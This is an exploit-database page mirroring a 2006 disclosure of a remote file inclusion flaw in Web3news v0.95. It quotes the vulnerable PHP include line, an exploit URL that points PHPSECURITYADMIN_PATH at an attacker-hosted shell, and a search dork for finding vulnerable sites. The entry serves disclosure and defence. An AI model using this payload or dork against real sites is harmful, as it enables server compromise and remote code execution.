header-logo
Suggest Exploit
vendor:
Web3news
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Web3news
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Web3news <= v0.95 (PHPSECURITYADMIN_PATH) Remote File Inclusion Exploit

A vulnerability exists in Web3news <= v0.95 due to improper validation of user-supplied input in the 'PHPSECURITYADMIN_PATH' parameter of the '/security/include/_class.security.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'PHPSECURITYADMIN_PATH' parameter. This can be exploited to gain access to the vulnerable system.

Mitigation:

Upgrade to the latest version of Web3news or apply the vendor-supplied patch.
Source

Exploit-DB raw data:

#==============================================================================================
#Web3news <= v0.95 (PHPSECURITYADMIN_PATH) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.web3king.com/web3news           
#                                                                           
#Version : All Versions                                                
#                                                             
#================================================================================================
#Bug in : security/include/_class.security.php
#
#Vlu Code :
#--------------------------------
#     <?
#                include $PHPSECURITYADMIN_PATH."lang/".$lang.".lang.php";
#    
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://SHELLURL.COM?
#
#Example : http://www.web3king.com/web3news/  ======> Vendor site
#
#DOrk : allinurl : /web3news/
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-08-28]